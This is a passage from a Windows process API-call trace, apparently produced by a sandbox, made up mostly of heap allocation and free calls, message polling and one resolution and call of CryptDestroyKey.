Flags=0x0, Size=0x38) returned 0x1458e58 [0121.488] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.488] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff280 [0121.488] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd700 [0121.489] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0121.489] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0121.489] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd940 [0121.489] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0121.489] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd940 | out: hHeap=0x12c0000) returned 1 [0121.489] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0121.489] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd928 [0121.489] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0121.489] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd790 [0121.489] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0121.489] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd940 [0121.489] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef960 [0121.489] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd958 [0121.489] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef960 | out: hHeap=0x12c0000) returned 1 [0121.489] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd970 [0121.489] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9a0 [0121.490] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8c8 [0121.490] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0121.490] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd988 [0121.490] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef900 [0121.490] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0121.490] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa90 [0121.490] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd898 [0121.490] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.490] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd808 [0121.490] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa80 [0121.490] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef940 [0121.490] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7d8 [0121.490] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0121.490] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0121.490] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7d8 | out: hHeap=0x12c0000) returned 1 [0121.490] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.490] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff190 [0121.490] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef9b0 [0121.491] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd730 [0121.491] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef910 [0121.491] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef940 [0121.491] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8e0 [0121.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd730 | out: hHeap=0x12c0000) returned 1 [0121.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef910 | out: hHeap=0x12c0000) returned 1 [0121.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8e0 | out: hHeap=0x12c0000) returned 1 [0121.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.491] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8e0 [0121.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef910 [0121.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0121.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd730 [0121.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x14bd730, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0121.492] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd730 | out: hHeap=0x12c0000) returned 1 [0121.492] GetProcAddress (hModule=0x77820000, lpProcName="CryptDestroyKey") returned 0x77840400 [0121.492] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8e0 | out: hHeap=0x12c0000) returned 1 [0121.493] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef910 | out: hHeap=0x12c0000) returned 1 [0121.493] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff2a8 [0121.493] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa00 [0121.493] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0121.493] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff2a8 | out: hHeap=0x12c0000) returned 1 [0121.493] CryptDestroyKey (hKey=0x1458c18) returned 0 [0121.493] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa80 [0121.493] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x133c448 [0121.493] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef900 [0121.493] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd730 [0121.493] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7a8 [0121.493] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd838 [0121.494] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef950 [0121.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd838 | out: hHeap=0x12c0000) returned 1 [0121.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef950 | out: hHeap=0x12c0000) returned 1 [0121.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7a8 | out: hHeap=0x12c0000) returned 1 [0121.494] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7a8 [0121.494] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd820 [0121.494] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8e0 [0121.494] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef940 [0121.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8e0 | out: hHeap=0x12c0000) returned 1 [0121.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd820 | out: hHeap=0x12c0000) returned 1 [0121.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9b0 | out: hHeap=0x12c0000) returned 1 [0121.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff190 | out: hHeap=0x12c0000) returned 1 [0121.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd898 | out: hHeap=0x12c0000) returned 1 [0121.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa90 | out: hHeap=0x12c0000) returned 1 [0121.495] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd700 | out: hHeap=0x12c0000) returned 1 [0121.495] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd790 | out: hHeap=0x12c0000) returned 1 [0121.495] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd928 | out: hHeap=0x12c0000) returned 1 [0121.495] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd958 | out: hHeap=0x12c0000) returned 1 [0121.495] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd940 | out: hHeap=0x12c0000) returned 1 [0121.495] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8c8 | out: hHeap=0x12c0000) returned 1 [0121.495] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd970 | out: hHeap=0x12c0000) returned 1 [0121.495] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd988 | out: hHeap=0x12c0000) returned 1 [0121.495] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff280 | out: hHeap=0x12c0000) returned 1 [0121.495] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd730 | out: hHeap=0x12c0000) returned 1 [0121.495] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7a8 | out: hHeap=0x12c0000) returned 1 [0121.495] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0121.496] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x133c448 | out: hHeap=0x12c0000) returned 1 [0121.496] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0121.496] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.496] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0121.496] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0121.496] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.496] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e58 | out: hHeap=0x12c0000) returned 1 [0121.496] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.496] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa50 [0121.496] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef960 [0121.496] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919d8 [0121.497] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919d8 | out: hHeap=0x12c0000) returned 1 [0121.497] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef960 | out: hHeap=0x12c0000) returned 1 [0121.497] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa50 | out: hHeap=0x12c0000) returned 1 [0121.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458e58 [0121.497] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.497] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e58 | out: hHeap=0x12c0000) returned 1 [0121.497] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef980 [0121.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0121.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b78 [0121.498] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b78 | out: hHeap=0x12c0000) returned 1 [0121.498] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0121.498] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef980 | out: hHeap=0x12c0000) returned 1 [0121.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0121.498] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.498] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458998 | out: hHeap=0x12c0000) returned 1 [0121.498] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa50 [0121.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef940 [0121.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0121.499] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0121.499] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.499] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa50 | out: hHeap=0x12c0000) returned 1 [0121.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0121.499] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.499] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458998 | out: hHeap=0x12c0000) returned 1 [0121.499] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8d0 [0121.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efab0 [0121.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491af8 [0121.500] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491af8 | out: hHeap=0x12c0000) returned 1 [0121.500] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efab0 | out: hHeap=0x12c0000) returned 1 [0121.500] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8d0 | out: hHeap=0x12c0000) returned 1 [0121.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ad8 [0121.500] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.500] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ad8 | out: hHeap=0x12c0000) returned 1 [0121.500] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9a0 [0121.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef940 [0121.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0121.500] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0121.500] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.500] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0121.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b18 [0121.501] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b18 | out: hHeap=0x12c0000) returned 1 [0121.501] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef940 [0121.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef910 [0121.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491998 [0121.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491998 | out: hHeap=0x12c0000) returned 1 [0121.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef910 | out: hHeap=0x12c0000) returned 1 [0121.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c98 [0121.501] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c98 | out: hHeap=0x12c0000) returned 1 [0121.501] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef900 [0121.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0121.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0121.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0121.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0121.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0121.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458e58 [0121.502] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e58 | out: hHeap=0x12c0000) returned 1 [0121.502] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0121.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef940 [0121.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ad8 [0121.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ad8 | out: hHeap=0x12c0000) returned 1 [0121.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.503] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0121.503] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14589d8 [0121.503] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.503] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14589d8 | out: hHeap=0x12c0000) returned 1 [0121.503] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.503] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8f0 [0121.503] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9f0 [0121.503] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0121.503] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0121.503] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9f0 | out: hHeap=0x12c0000) returned 1 [0121.503] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8f0 | out: hHeap=0x12c0000) returned 1 [0121.503] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d18 [0121.503] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.503] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d18 | out: hHeap=0x12c0000) returned 1 [0121.503] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.503] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0121.503] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8f0 [0121.503] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a18 [0121.504] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0121.504] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8f0 | out: hHeap=0x12c0000) returned 1 [0121.504] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0121.504] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ad8 [0121.504] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.504] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ad8 | out: hHeap=0x12c0000) returned 1 [0121.504] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.504] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0121.504] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9a0 [0121.504] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a98 [0121.504] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a98 | out: hHeap=0x12c0000) returned 1 [0121.504] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0121.504] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0121.504] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d18 [0121.504] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.505] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d18 | out: hHeap=0x12c0000) returned 1 [0121.505] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.505] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef990 [0121.505] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa30 [0121.505] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0121.522] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0121.522] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0121.522] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef990 | out: hHeap=0x12c0000) returned 1 [0121.522] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c58 [0121.522] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.522] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c58 | out: hHeap=0x12c0000) returned 1 [0121.522] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.522] 